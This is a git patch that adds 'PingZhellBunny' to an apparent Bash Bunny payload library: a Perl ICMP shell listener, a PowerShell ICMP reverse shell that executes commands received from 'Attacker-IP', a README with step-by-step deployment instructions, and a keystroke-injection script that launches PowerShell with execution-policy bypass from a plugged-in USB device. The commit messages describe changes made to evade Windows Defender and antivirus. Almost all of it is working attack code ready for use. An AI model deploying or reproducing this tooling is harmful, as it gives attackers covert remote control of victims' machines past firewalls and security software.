From b64503fe23489d713f024ad0ee9516635a82b9db Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Thu, 23 Dec 2021 22:42:21 +0100 Subject: [PATCH] Uploaded PingZhellBunny (#480) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away šŸ‡ * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md * Deleted ReverseBunny.txt Deleted because of higher risk to get caught by AV * Updated ReverseBunny to version 1.2 Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design * Updated ReverseBunny to version 1.2 Updated README for ReverseBunny update * Updated payload fixed some stupid left overs <3 * Uploaded pingUinBunny a reverse shell using icmp * Delete payloads/library/remote_access/switch1 directory * Uploaded pingUinBunny A reverse shell using icmp * Update README.md * Update README.md * Updated to PingZhell * Update Bunny.pl * Update README.md * Update README.md * Update payload.txt * Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl * Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 * Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md * Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt * Update payload.txt * Update README.md * Update README.md * Update Bunny.pl --- .../remote_access/PingZhellBunny/Bunny.pl | 66 ++++++++++++++ .../PingZhellBunny/PingZhell.ps1 | 86 +++++++++++++++++++ .../remote_access/PingZhellBunny/README.md | 41 +++++++++ .../remote_access/PingZhellBunny/payload.txt | 39 +++++++++ 4 files changed, 232 insertions(+) create mode 100644 payloads/library/remote_access/PingZhellBunny/Bunny.pl create mode 100644 payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 create mode 100644 payloads/library/remote_access/PingZhellBunny/README.md create mode 100644 payloads/library/remote_access/PingZhellBunny/payload.txt diff --git a/payloads/library/remote_access/PingZhellBunny/Bunny.pl b/payloads/library/remote_access/PingZhellBunny/Bunny.pl new file mode 100644 index 00000000..a00eb064 --- /dev/null +++ b/payloads/library/remote_access/PingZhellBunny/Bunny.pl @@ -0,0 +1,66 @@ +#!/usr/bin/env perl +# +# icmpsh - simple icmp command shell +# Copyright (c) 2010, Nico Leidecker +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# +# Modified by 0iphor13 for PingZhell +# +# +# +# + + +use strict; +use IO::Socket; +use NetPacket::IP; +use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO); +use Net::RawIP; +use Fcntl; + +print "Bunny waitin' for connection...\n"; + +# create raw socket +my $sock = IO::Socket::INET->new( + Proto => "ICMP", + Type => SOCK_RAW, + Blocking => 1) or die "$!"; + +# set stdin to non-blocking +fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!"; + +print "Let's wait for PingZhell!\n"; + +my $input = ''; +while(1) { + if ($sock->recv(my $buffer, 4096, 0)) { + my $ip = NetPacket::IP->decode($buffer); + my $icmp = NetPacket::ICMP->decode($ip->{data}); + if ($icmp->{type} == ICMP_ECHO) { + # get identifier and sequencenumber + my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data}); + + # write data to stdout and read from stdin + print $data; + $input = ; + + # compile and send response + $icmp->{type} = ICMP_ECHOREPLY; + $icmp->{data} = pack("SSa*", $ident, $seq, $input); + my $raw = $icmp->encode(); + my $addr = sockaddr_in(0, inet_aton($ip->{src_ip})); + $sock->send($raw, 0, $addr) or die "$!\n"; + } + } +} diff --git a/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 b/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 new file mode 100644 index 00000000..2687d299 --- /dev/null +++ b/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 @@ -0,0 +1,86 @@ + +<# + +Original script by nishang - modified by 0iphor13 for PingZhell + +Use bunny.pl as a master + +When running the master, don't forget to disable ICMP replies by the OS. For example: +$: sysctl -w net.ipv4.icmp_echo_ignore_all=1 +Then: +$: perl bunny.pl + +Microsoft please don't block, oh dear microsoft corporation +#> + + + $IPAddress = 'Attacker-IP' + $Delay = 5 + $BufferSize = 128 + + #Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response + $ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping + $PingOptions = New-Object System.Net.NetworkInformation.PingOptions + $PingOptions.DontFragment = $True + $MicrosoftCopyright =@" + _______ ___ __ _ _______ _______ __ __ _______ ___ ___ +| | | | | | | | | | | | | | | +| _ | | |_| | ___|____ | |_| | ___| | | | +| |_| | | | | __ ____| | | |___| | | | +| ___| | _ | || | ______| | ___| |___| |___ +| | | | | | | |_| | |_____| _ | |___| | | +|___| |___|_| |__|_______|_______|__| |__|_______|_______|_______| + + +Windows PowerShell running as user $env:username on $env:computername `n +"@; + + # Copyright Copies Right + $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright) + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null + + #Does a german penguin just PingUin? + $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ') + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null + + while ($true) + { + $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('') + $reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) + + if ($reply.Buffer) + { + $response = ([text.encoding]::ASCII).GetString($reply.Buffer) + $result = (Invoke-Expression -Command $response 2>&1 | Out-String ) + $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result) + $index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize) + $i = 0 + + #Fragmant larger output into smaller ones to send to the server. + if ($NeverGonnaGiveYouUp.length -gt $BufferSize) + { + while ($i -lt $index ) + { + $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)] + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null + $i +=1 + } + $remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize + if ($remainingindex -ne 0) + { + $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)] + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null + } + } + else + { + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null + } + $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ') + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null + } + else + { + Start-Sleep -Seconds $Delay + } + } diff --git a/payloads/library/remote_access/PingZhellBunny/README.md b/payloads/library/remote_access/PingZhellBunny/README.md new file mode 100644 index 00000000..fe1bcb23 --- /dev/null +++ b/payloads/library/remote_access/PingZhellBunny/README.md @@ -0,0 +1,41 @@ +**Title: PingZhellBunny** + +Author: 0iphor13 + +Version: 1.3 + +What is PingZhellBunny? +# +*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).* +*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.* +*ICMP stands for Internet Control Message Protocol; it is used by network devicesā€™ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.* +*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.* +*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.* +*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhell.ps1) and sends it commands to execute.* +# +There you go, a reverse shell. + +**Instruction:** + +Upload Bunny.pl onto your attacking machine. +Install dependencies, if needed: +- IO::Socket +- NetPacket::IP +- NetPacket::ICMP + +Disable ICMP replies by the OS: + *sysctl -w net.ipv4.icmp_echo_ignore_all=1* + +Start Bunny.pl -> perl Bunny.pl +# +!!!Insert the IP of your attacking machine into PingZhell.ps1!!! +# +Plug in Bashbunny with PingZhellBunny equipped. +Achieve reverse shell. +run away <3 + + +Credit for code and ideas: +- bdamele +- nishang +- krabelize diff --git a/payloads/library/remote_access/PingZhellBunny/payload.txt b/payloads/library/remote_access/PingZhellBunny/payload.txt new file mode 100644 index 00000000..ca6416ee --- /dev/null +++ b/payloads/library/remote_access/PingZhellBunny/payload.txt @@ -0,0 +1,39 @@ +#!/bin/bash +# +# Title: PingZhellBunny +# Description: Get remote access using a icmp reverse shell. +# Author: 0iphor13 +# Version: 1.3 +# Category: Remote_Access +# Attackmodes: HID, Storage + +LED SETUP + +DELAY 500 + +GET SWITCH_POSITION +DUCKY_LANG de + +DELAY 500 + +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 + +#After you have adapted the delays for your target, add "-W hidden" +DELAY 5000 +RUN WIN "powershell -Exec Bypass -NoP -NonI" +DELAY 6000 +Q ENTER + +DELAY 20000 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')" +DELAY 20000 +Q ENTER +DELAY 15000 + +ATTACKMODE HID + +LED FINISH